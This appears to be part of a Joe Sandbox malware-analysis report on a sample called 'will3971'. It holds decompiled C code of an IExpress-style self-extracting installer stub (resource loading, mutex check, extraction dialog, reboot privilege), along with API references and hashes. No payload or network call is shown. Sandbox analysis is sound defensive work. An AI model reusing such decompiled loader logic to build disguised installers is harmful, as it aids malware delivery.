                                                0x002f5f34
                                                0x002f5ef4
                                                0x002f5ef4
                                                0x002f5ef7
                                                0x002f5f2b
                                                0x00000000
                                                0x002f5ef9
                                                0x002f5ef9
                                                0x002f5efc
                                                0x002f5f22
                                                0x00000000
                                                0x002f5efe
                                                0x002f5eff
                                                0x002f5f02
                                                0x002f5f16
                                                0x002f5f04
                                                0x002f5f07
                                                0x002f5f0d
                                                0x002f5f46
                                                0x002f5f46
                                                0x002f5f09
                                                0x002f5f09
                                                0x002f5f09
                                                0x002f5f07
                                                0x002f5f02
                                                0x002f5efc
                                                0x002f5ef7
                                                0x002f5ef2
                                                0x002f5f4c
                                                0x002f5f4e
                                                0x002f5f50
                                                0x002f5f54
                                                0x002f5ed4
                                                0x002f5ea2
                                                0x002f5ea4
                                                0x002f5eaf
                                                0x002f5eaf
                                                0x00000000
                                                0x002f5e79
                                                0x002f5e7d
                                                0x00000000
                                                0x002f5e83
                                                0x002f5e83
                                                0x002f5e83
                                                0x002f5e85
                                                0x002f5e85
                                                0x002f5e8e
                                                0x00000000
                                                0x002f5e94
                                                0x00000000
                                                0x002f5e94
                                                0x002f5e8e
                                                0x002f5e7d
                                                0x002f5e77
                                                0x002f5e6e
                                                0x002f5e65
                                                0x002f5e5c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f5dd0
                                                0x002f5dd0
                                                0x002f5dd0
                                                0x00000000
                                                0x002f5dd0
                                                0x002f5dce
                                                0x002f5dca
                                                0x002f5dba
                                                0x00000000
                                                0x002f5d00
                                                0x002f5dd9
                                                0x002f5e04
                                                0x002f61fe
                                                0x002f5e0a
                                                0x002f5e0c
                                                0x002f5e17
                                                0x002f5e17
                                                0x002f5e04
                                                0x002f6200
                                                0x002f6200
                                                0x00000000

                                                APIs
                                                • CharNextA.USER32(?,00000000,?,?), ref: 002F5CEE
                                                • GetModuleFileNameA.KERNEL32(002F8B3E,00000104,00000000,?,?), ref: 002F5DFC
                                                • CharUpperA.USER32(?), ref: 002F5E3E
                                                • CharUpperA.USER32(-00000052), ref: 002F5EE1
                                                • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 002F5F6F
                                                • CharUpperA.USER32(?), ref: 002F5FA7
                                                • CharUpperA.USER32(-0000004E), ref: 002F6008
                                                • CharUpperA.USER32(?), ref: 002F60AA
                                                • CloseHandle.KERNEL32(00000000,002F1140,00000000,00000040,00000000), ref: 002F61F1
                                                • ExitProcess.KERNEL32 ref: 002F61F8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                • String ID: "$"$:$RegServer
                                                • API String ID: 1203814774-25366791
                                                • Opcode ID: 32ccd7e39887cee61c4459e38893c2b7d3224015281c9a3d5b698d8102fd82ab
                                                • Instruction ID: 523b1fd832ab21dfaed54b3768714c16deb7b14b4d2c622ced77b6f9b5afe082
                                                • Opcode Fuzzy Hash: 32ccd7e39887cee61c4459e38893c2b7d3224015281c9a3d5b698d8102fd82ab
                                                • Instruction Fuzzy Hash: B6D14C71A34A6E5ADB358F389C4C7B6F761E7163D0F1401BAC78AC6591DAB44EA2CF00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E002F1F90(signed int __ecx, void* __edi, void* __esi) {
                                                				signed int _v8;
                                                				int _v12;
                                                				struct _TOKEN_PRIVILEGES _v24;
                                                				void* _v28;
                                                				void* __ebx;
                                                				signed int _t13;
                                                				int _t21;
                                                				void* _t25;
                                                				int _t28;
                                                				signed char _t30;
                                                				void* _t38;
                                                				void* _t40;
                                                				void* _t41;
                                                				signed int _t46;
                                                
                                                				_t41 = __esi;
                                                				_t38 = __edi;
                                                				_t30 = __ecx;
                                                				if((__ecx & 0x00000002) != 0) {
                                                					L12:
                                                					if((_t30 & 0x00000004) != 0) {
                                                						L14:
                                                						if( *0x2f9a40 != 0) {
                                                							_pop(_t30);
                                                							_t44 = _t46;
                                                							_t13 =  *0x2f8004; // 0x404cc811
                                                							_v8 = _t13 ^ _t46;
                                                							_push(_t38);
                                                							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                								_v24.PrivilegeCount = 1;
                                                								_v12 = 2;
                                                								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                								CloseHandle(_v28);
                                                								_t41 = _t41;
                                                								_push(0);
                                                								if(_t21 != 0) {
                                                									if(ExitWindowsEx(2, ??) != 0) {
                                                										_t25 = 1;
                                                									} else {
                                                										_t37 = 0x4f7;
                                                										goto L3;
                                                									}
                                                								} else {
                                                									_t37 = 0x4f6;
                                                									goto L4;
                                                								}
                                                							} else {
                                                								_t37 = 0x4f5;
                                                								L3:
                                                								_push(0);
                                                								L4:
                                                								_push(0x10);
                                                								_push(0);
                                                								_push(0);
                                                								E002F44B9(0, _t37);
                                                								_t25 = 0;
                                                							}
                                                							_pop(_t40);
                                                							return E002F6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                						} else {
                                                							_t28 = ExitWindowsEx(2, 0);
                                                							goto L16;
                                                						}
                                                					} else {
                                                						_t37 = 0x522;
                                                						_t28 = E002F44B9(0, 0x522, 0x2f1140, 0, 0x40, 4);
                                                						if(_t28 != 6) {
                                                							goto L16;
                                                						} else {
                                                							goto L14;
                                                						}
                                                					}
                                                				} else {
                                                					__eax = E002F1EA7(__ecx);
                                                					if(__eax != 2) {
                                                						L16:
                                                						return _t28;
                                                					} else {
                                                						goto L12;
                                                					}
                                                				}
                                                			}

















                                                0x002f1f90
                                                0x002f1f90
                                                0x002f1f93
                                                0x002f1f98
                                                0x002f1fa4
                                                0x002f1fa7
                                                0x002f1fc5
                                                0x002f1fcd
                                                0x002f1fdb
                                                0x002f1ee5
                                                0x002f1eea
                                                0x002f1ef1
                                                0x002f1ef4
                                                0x002f1f0c
                                                0x002f1f2e
                                                0x002f1f3a
                                                0x002f1f46
                                                0x002f1f4d
                                                0x002f1f58
                                                0x002f1f60
                                                0x002f1f61
                                                0x002f1f62
                                                0x002f1f75
                                                0x002f1f80
                                                0x002f1f77
                                                0x002f1f77
                                                0x00000000
                                                0x002f1f77
                                                0x002f1f64
                                                0x002f1f64
                                                0x00000000
                                                0x002f1f64
                                                0x002f1f0e
                                                0x002f1f0e
                                                0x002f1f13
                                                0x002f1f13
                                                0x002f1f14
                                                0x002f1f14
                                                0x002f1f16
                                                0x002f1f17
                                                0x002f1f1a
                                                0x002f1f1f
                                                0x002f1f1f
                                                0x002f1f86
                                                0x002f1f8f
                                                0x002f1fcf
                                                0x002f1fd3
                                                0x00000000
                                                0x002f1fd3
                                                0x002f1fa9
                                                0x002f1fb4
                                                0x002f1fbb
                                                0x002f1fc3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f1fc3
                                                0x002f1f9a
                                                0x002f1f9a
                                                0x002f1fa2
                                                0x002f1fd9
                                                0x002f1fda
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f1fa2

                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 002F1EFB
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 002F1F02
                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 002F1FD3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitOpenTokenWindows
                                                • String ID: SeShutdownPrivilege
                                                • API String ID: 2795981589-3733053543
                                                • Opcode ID: 6ec83061eb9c8c6907e3d787b1117b7c3555d023d36510fefe1b41ae99f7206d
                                                • Instruction ID: 9d403a263d8f5ce725fd569756d6cd1f4dbb5a7323be94c2ae5f72c2b0ed1a39
                                                • Opcode Fuzzy Hash: 6ec83061eb9c8c6907e3d787b1117b7c3555d023d36510fefe1b41ae99f7206d
                                                • Instruction Fuzzy Hash: 1921DBB1A50309E7DB205BA1AC4EF7BB6B8DB857E0F50013DFB06E6580D7748831D661
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F6CF0(char _a4) {
                                                
                                                				SetUnhandledExceptionFilter(0);
                                                				_t1 =  &_a4; // 0x2f6e26
                                                				UnhandledExceptionFilter( *_t1);
                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                			}



                                                0x002f6cf7
                                                0x002f6cfd
                                                0x002f6d00
                                                0x002f6d19

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,002F6E26,002F1000), ref: 002F6CF7
                                                • UnhandledExceptionFilter.KERNEL32(&n/,?,002F6E26,002F1000), ref: 002F6D00
                                                • GetCurrentProcess.KERNEL32(C0000409,?,002F6E26,002F1000), ref: 002F6D0B
                                                • TerminateProcess.KERNEL32(00000000,?,002F6E26,002F1000), ref: 002F6D12
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                • String ID: &n/
                                                • API String ID: 3231755760-2469304368
                                                • Opcode ID: 74ed8c9927d443847329db85b2d2ef2607e0c54fc3af751d4333ffcec5071cb5
                                                • Instruction ID: 9ae43307f19514fb3c0437802aafaa67cb346acd5b46e42f39ac57d050816f0e
                                                • Opcode Fuzzy Hash: 74ed8c9927d443847329db85b2d2ef2607e0c54fc3af751d4333ffcec5071cb5
                                                • Instruction Fuzzy Hash: 2BD0C9B2000108BBDB002BE1FC0CA6A3F28FB482B2F464020F31D82060CA329451CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E002F3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				void* __edi;
                                                				void* _t6;
                                                				void* _t10;
                                                				int _t20;
                                                				int _t21;
                                                				int _t23;
                                                				char _t24;
                                                				long _t25;
                                                				int _t27;
                                                				int _t30;
                                                				void* _t32;
                                                				int _t33;
                                                				int _t34;
                                                				int _t37;
                                                				int _t38;
                                                				int _t39;
                                                				void* _t42;
                                                				void* _t46;
                                                				CHAR* _t49;
                                                				void* _t58;
                                                				void* _t63;
                                                				struct HWND__* _t64;
                                                
                                                				_t64 = _a4;
                                                				_t6 = _a8 - 0x10;
                                                				if(_t6 == 0) {
                                                					_push(0);
                                                					L38:
                                                					EndDialog(_t64, ??);
                                                					L39:
                                                					__eflags = 1;
                                                					return 1;
                                                				}
                                                				_t42 = 1;
                                                				_t10 = _t6 - 0x100;
                                                				if(_t10 == 0) {
                                                					E002F43D0(_t64, GetDesktopWindow());
                                                					SetWindowTextA(_t64, "lega");
                                                					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                					__eflags =  *0x2f9a40 - _t42; // 0x3
                                                					if(__eflags == 0) {
                                                						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                					}
                                                					L36:
                                                					return _t42;
                                                				}
                                                				if(_t10 == _t42) {
                                                					_t20 = _a12 - 1;
                                                					__eflags = _t20;
                                                					if(_t20 == 0) {
                                                						_t21 = GetDlgItemTextA(_t64, 0x835, 0x2f91e4, 0x104);
                                                						__eflags = _t21;
                                                						if(_t21 == 0) {
                                                							L32:
                                                							_t58 = 0x4bf;
                                                							_push(0);
                                                							_push(0x10);
                                                							_push(0);
                                                							_push(0);
                                                							L25:
                                                							E002F44B9(_t64, _t58);
                                                							goto L39;
                                                						}
                                                						_t49 = 0x2f91e4;
                                                						do {
                                                							_t23 =  *_t49;
                                                							_t49 =  &(_t49[1]);
                                                							__eflags = _t23;
                                                						} while (_t23 != 0);
                                                						__eflags = _t49 - 0x2f91e5 - 3;
                                                						if(_t49 - 0x2f91e5 < 3) {
                                                							goto L32;
                                                						}
                                                						_t24 =  *0x2f91e5; // 0x3a
                                                						__eflags = _t24 - 0x3a;
                                                						if(_t24 == 0x3a) {
                                                							L21:
                                                							_t25 = GetFileAttributesA(0x2f91e4);
                                                							__eflags = _t25 - 0xffffffff;
                                                							if(_t25 != 0xffffffff) {
                                                								L26:
                                                								E002F658A(0x2f91e4, 0x104, 0x2f1140);
                                                								_t27 = E002F58C8(0x2f91e4);
                                                								__eflags = _t27;
                                                								if(_t27 != 0) {
                                                									__eflags =  *0x2f91e4 - 0x5c;
                                                									if( *0x2f91e4 != 0x5c) {
                                                										L30:
                                                										_t30 = E002F597D(0x2f91e4, 1, _t64, 1);
                                                										__eflags = _t30;
                                                										if(_t30 == 0) {
                                                											L35:
                                                											_t42 = 1;
                                                											__eflags = 1;
                                                											goto L36;
                                                										}
                                                										L31:
                                                										_t42 = 1;
                                                										EndDialog(_t64, 1);
                                                										goto L36;
                                                									}
                                                									__eflags =  *0x2f91e5 - 0x5c;
                                                									if( *0x2f91e5 == 0x5c) {
                                                										goto L31;
                                                									}
                                                									goto L30;
                                                								}
                                                								_push(0);
                                                								_push(0x10);
                                                								_push(0);
                                                								_push(0);
                                                								_t58 = 0x4be;
                                                								goto L25;
                                                							}
                                                							_t32 = E002F44B9(_t64, 0x54a, 0x2f91e4, 0, 0x20, 4);
                                                							__eflags = _t32 - 6;
                                                							if(_t32 != 6) {
                                                								goto L35;
                                                							}
                                                							_t33 = CreateDirectoryA(0x2f91e4, 0);
                                                							__eflags = _t33;
                                                							if(_t33 != 0) {
                                                								goto L26;
                                                							}
                                                							_push(0);
                                                							_push(0x10);
                                                							_push(0);
                                                							_push(0x2f91e4);
                                                							_t58 = 0x4cb;
                                                							goto L25;
                                                						}
                                                						__eflags =  *0x2f91e4 - 0x5c;
                                                						if( *0x2f91e4 != 0x5c) {
                                                							goto L32;
                                                						}
                                                						__eflags = _t24 - 0x5c;
                                                						if(_t24 != 0x5c) {
                                                							goto L32;
                                                						}
                                                						goto L21;
                                                					}
                                                					_t34 = _t20 - 1;
                                                					__eflags = _t34;
                                                					if(_t34 == 0) {
                                                						EndDialog(_t64, 0);
                                                						 *0x2f9124 = 0x800704c7;
                                                						goto L39;
                                                					}
                                                					__eflags = _t34 != 0x834;
                                                					if(_t34 != 0x834) {
                                                						goto L36;
                                                					}
                                                					_t37 = LoadStringA( *0x2f9a3c, 0x3e8, 0x2f8598, 0x200);
                                                					__eflags = _t37;
                                                					if(_t37 != 0) {
                                                						_t38 = E002F4224(_t64, _t46, _t46);
                                                						__eflags = _t38;
                                                						if(_t38 == 0) {
                                                							goto L36;
                                                						}
                                                						_t39 = SetDlgItemTextA(_t64, 0x835, 0x2f87a0);
                                                						__eflags = _t39;
                                                						if(_t39 != 0) {
                                                							goto L36;
                                                						}
                                                						_t63 = 0x4c0;
                                                						L9:
                                                						E002F44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                						_push(0);
                                                						goto L38;
                                                					}
                                                					_t63 = 0x4b1;
                                                					goto L9;
                                                				}
                                                				return 0;
                                                			}

























                                                0x002f321b
                                                0x002f321e
                                                0x002f3221
                                                0x002f343c
                                                0x002f343e
                                                0x002f343f
                                                0x002f3445
                                                0x002f3447
                                                0x00000000
                                                0x002f3447
                                                0x002f3229
                                                0x002f322a
                                                0x002f322f
                                                0x002f33ec
                                                0x002f33f7
                                                0x002f3410
                                                0x002f3416
                                                0x002f341d
                                                0x002f342d
                                                0x002f342d
                                                0x002f3438
                                                0x00000000
                                                0x002f3438
                                                0x002f3237
                                                0x002f3243
                                                0x002f3243
                                                0x002f3246
                                                0x002f32ee
                                                0x002f32f4
                                                0x002f32f6
                                                0x002f33d4
                                                0x002f33d6
                                                0x002f33db
                                                0x002f33dc
                                                0x002f33de
                                                0x002f33df
                                                0x002f3370
                                                0x002f3372
                                                0x00000000
                                                0x002f3372
                                                0x002f32fc
                                                0x002f3301
                                                0x002f3301
                                                0x002f3303
                                                0x002f3304
                                                0x002f3304
                                                0x002f330a
                                                0x002f330d
                                                0x00000000
                                                0x00000000
                                                0x002f3313
                                                0x002f3318
                                                0x002f331a
                                                0x002f3331
                                                0x002f3332
                                                0x002f333a
                                                0x002f333d
                                                0x002f337c
                                                0x002f3388
                                                0x002f338f
                                                0x002f3394
                                                0x002f3396
                                                0x002f33a4
                                                0x002f33ab
                                                0x002f33b6
                                                0x002f33be
                                                0x002f33c3
                                                0x002f33c5
                                                0x002f3435
                                                0x002f3437
                                                0x002f3437
                                                0x00000000
                                                0x002f3437
                                                0x002f33c7
                                                0x002f33c9
                                                0x002f33cc
                                                0x00000000
                                                0x002f33cc
                                                0x002f33ad
                                                0x002f33b4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f33b4
                                                0x002f3398
                                                0x002f3399
                                                0x002f339b
                                                0x002f339c
                                                0x002f339d
                                                0x00000000
                                                0x002f339d
                                                0x002f334c
                                                0x002f3351
                                                0x002f3354
                                                0x00000000
                                                0x00000000
                                                0x002f335c
                                                0x002f3362
                                                0x002f3364
                                                0x00000000
                                                0x00000000
                                                0x002f3366
                                                0x002f3367
                                                0x002f3369
                                                0x002f336a
                                                0x002f336b
                                                0x00000000
                                                0x002f336b
                                                0x002f331c
                                                0x002f3323
                                                0x00000000
                                                0x00000000
                                                0x002f3329
                                                0x002f332b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f332b
                                                0x002f324c
                                                0x002f324c
                                                0x002f324f
                                                0x002f32c8
                                                0x002f32ce
                                                0x00000000
                                                0x002f32ce
                                                0x002f3251
                                                0x002f3256
                                                0x00000000
                                                0x00000000
                                                0x002f3271
                                                0x002f3277
                                                0x002f3279
                                                0x002f3298
                                                0x002f329d
                                                0x002f329f
                                                0x00000000
                                                0x00000000
                                                0x002f32b0
                                                0x002f32b6
                                                0x002f32b8
                                                0x00000000
                                                0x00000000
                                                0x002f32be
                                                0x002f3280
                                                0x002f3289
                                                0x002f328e
                                                0x00000000
                                                0x002f328e
                                                0x002f327b
                                                0x00000000
                                                0x002f327b
                                                0x00000000

                                                APIs
                                                • LoadStringA.USER32(000003E8,002F8598,00000200), ref: 002F3271
                                                • GetDesktopWindow.USER32 ref: 002F33E2
                                                • SetWindowTextA.USER32(?,lega), ref: 002F33F7
                                                • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 002F3410
                                                • GetDlgItem.USER32(?,00000836), ref: 002F3426
                                                • EnableWindow.USER32(00000000), ref: 002F342D
                                                • EndDialog.USER32(?,00000000), ref: 002F343F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$lega
                                                • API String ID: 2418873061-57479750
                                                • Opcode ID: 2875091d8dee984065bd8e127cf7d0482e34a128c306db7c91b74e5b29a4c33a
                                                • Instruction ID: 15e55740dc369d21aa74565da44f2ffac3ffebac95bbf70fd797a6856ad705ab
                                                • Opcode Fuzzy Hash: 2875091d8dee984065bd8e127cf7d0482e34a128c306db7c91b74e5b29a4c33a
                                                • Instruction Fuzzy Hash: 24512A7036124E76E721EF356C4CF7BE9489B86BE0F104034F70AD51C0CAE48A61E3A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E002F2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t13;
                                                				void* _t20;
                                                				void* _t23;
                                                				void* _t27;
                                                				struct HRSRC__* _t31;
                                                				intOrPtr _t33;
                                                				void* _t43;
                                                				void* _t48;
                                                				signed int _t65;
                                                				struct HINSTANCE__* _t66;
                                                				signed int _t67;
                                                
                                                				_t13 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t13 ^ _t67;
                                                				_t65 = 0;
                                                				_t66 = __ecx;
                                                				_t48 = __edx;
                                                				 *0x2f9a3c = __ecx;
                                                				memset(0x2f9140, 0, 0x8fc);
                                                				memset(0x2f8a20, 0, 0x32c);
                                                				memset(0x2f88c0, 0, 0x104);
                                                				 *0x2f93ec = 1;
                                                				_t20 = E002F468F("TITLE", 0x2f9154, 0x7f);
                                                				if(_t20 == 0 || _t20 > 0x80) {
                                                					_t64 = 0x4b1;
                                                					goto L32;
                                                				} else {
                                                					_t27 = CreateEventA(0, 1, 1, 0);
                                                					 *0x2f858c = _t27;
                                                					SetEvent(_t27);
                                                					_t64 = 0x2f9a34;
                                                					if(E002F468F("EXTRACTOPT", 0x2f9a34, 4) != 0) {
                                                						if(( *0x2f9a34 & 0x000000c0) == 0) {
                                                							L12:
                                                							 *0x2f9120 =  *0x2f9120 & _t65;
                                                							if(E002F5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                								if( *0x2f8a3a == 0) {
                                                									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                									if(_t31 != 0) {
                                                										_t65 = LoadResource(_t66, _t31);
                                                									}
                                                									if( *0x2f8184 != 0) {
                                                										__imp__#17();
                                                									}
                                                									if( *0x2f8a24 == 0) {
                                                										_t57 = _t65;
                                                										if(E002F36EE(_t65) == 0) {
                                                											goto L33;
                                                										} else {
                                                											_t33 =  *0x2f9a40; // 0x3
                                                											_t48 = 1;
                                                											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                												if(( *0x2f9a34 & 0x00000100) == 0 || ( *0x2f8a38 & 0x00000001) != 0 || E002F18A3(_t64, _t66) != 0) {
                                                													goto L30;
                                                												} else {
                                                													_t64 = 0x7d6;
                                                													if(E002F6517(_t57, 0x7d6, _t34, E002F19E0, 0x547, 0x83e) != 0x83d) {
                                                														goto L33;
                                                													} else {
                                                														goto L30;
                                                													}
                                                												}
                                                											} else {
                                                												L30:
                                                												_t23 = _t48;
                                                											}
                                                										}
                                                									} else {
                                                										_t23 = 1;
                                                									}
                                                								} else {
                                                									E002F2390(0x2f8a3a);
                                                									goto L33;
                                                								}
                                                							} else {
                                                								_t64 = 0x520;
                                                								L32:
                                                								E002F44B9(0, _t64, 0, 0, 0x10, 0);
                                                								goto L33;
                                                							}
                                                						} else {
                                                							_t64 =  &_v268;
                                                							if(E002F468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                								goto L3;
                                                							} else {
                                                								_t43 = CreateMutexA(0, 1,  &_v268);
                                                								 *0x2f8588 = _t43;
                                                								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                									goto L12;
                                                								} else {
                                                									if(( *0x2f9a34 & 0x00000080) == 0) {
                                                										_t64 = 0x524;
                                                										if(E002F44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                											goto L12;
                                                										} else {
                                                											goto L11;
                                                										}
                                                									} else {
                                                										_t64 = 0x54b;
                                                										E002F44B9(0, 0x54b, "lega", 0, 0x10, 0);
                                                										L11:
                                                										CloseHandle( *0x2f8588);
                                                										 *0x2f9124 = 0x800700b7;
                                                										goto L33;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						L3:
                                                						_t64 = 0x4b1;
                                                						E002F44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                						 *0x2f9124 = 0x80070714;
                                                						L33:
                                                						_t23 = 0;
                                                					}
                                                				}
                                                				return E002F6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                			}



















                                                0x002f2cb5
                                                0x002f2cbc
                                                0x002f2cc7
                                                0x002f2cc9
                                                0x002f2cd1
                                                0x002f2cd3
                                                0x002f2cd9
                                                0x002f2ce9
                                                0x002f2cf9
                                                0x002f2d0e
                                                0x002f2d15
                                                0x002f2d1c
                                                0x002f2ef3
                                                0x00000000
                                                0x002f2d2d
                                                0x002f2d34
                                                0x002f2d3b
                                                0x002f2d40
                                                0x002f2d48
                                                0x002f2d59
                                                0x002f2d84
                                                0x002f2e1f
                                                0x002f2e1f
                                                0x002f2e2e
                                                0x002f2e41
                                                0x002f2e5a
                                                0x002f2e62
                                                0x002f2e6c
                                                0x002f2e6c
                                                0x002f2e75
                                                0x002f2e77
                                                0x002f2e77
                                                0x002f2e84
                                                0x002f2e8b
                                                0x002f2e94
                                                0x00000000
                                                0x002f2e96
                                                0x002f2e96
                                                0x002f2e9e
                                                0x002f2ea2
                                                0x002f2eba
                                                0x00000000
                                                0x002f2ece
                                                0x002f2ede
                                                0x002f2eed
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f2eed
                                                0x002f2eef
                                                0x002f2eef
                                                0x002f2eef
                                                0x002f2eef
                                                0x002f2ea2
                                                0x002f2e86
                                                0x002f2e88
                                                0x002f2e88
                                                0x002f2e43
                                                0x002f2e48
                                                0x00000000
                                                0x002f2e48
                                                0x002f2e30
                                                0x002f2e30
                                                0x002f2ef8
                                                0x002f2f01
                                                0x00000000
                                                0x002f2f01
                                                0x002f2d8a
                                                0x002f2d8f
                                                0x002f2da1
                                                0x00000000
                                                0x002f2da3
                                                0x002f2dae
                                                0x002f2db4
                                                0x002f2dbb
                                                0x00000000
                                                0x002f2dca
                                                0x002f2dd3
                                                0x002f2df5
                                                0x002f2e02
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f2dd5
                                                0x002f2dde
                                                0x002f2de3
                                                0x002f2e04
                                                0x002f2e0a
                                                0x002f2e10
                                                0x00000000
                                                0x002f2e10
                                                0x002f2dd3
                                                0x002f2dbb
                                                0x002f2da1
                                                0x002f2d5b
                                                0x002f2d5b
                                                0x002f2d5d
                                                0x002f2d69
                                                0x002f2d6e
                                                0x002f2f06
                                                0x002f2f06
                                                0x002f2f06
                                                0x002f2d59
                                                0x002f2f18

                                                APIs
                                                • memset.MSVCRT ref: 002F2CD9
                                                • memset.MSVCRT ref: 002F2CE9
                                                • memset.MSVCRT ref: 002F2CF9
                                                  • Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
                                                  • Part of subcall function 002F468F: SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
                                                  • Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
                                                  • Part of subcall function 002F468F: LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
                                                  • Part of subcall function 002F468F: LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
                                                  • Part of subcall function 002F468F: memcpy_s.MSVCRT ref: 002F46E5
                                                  • Part of subcall function 002F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF
                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F2D34
                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 002F2D40
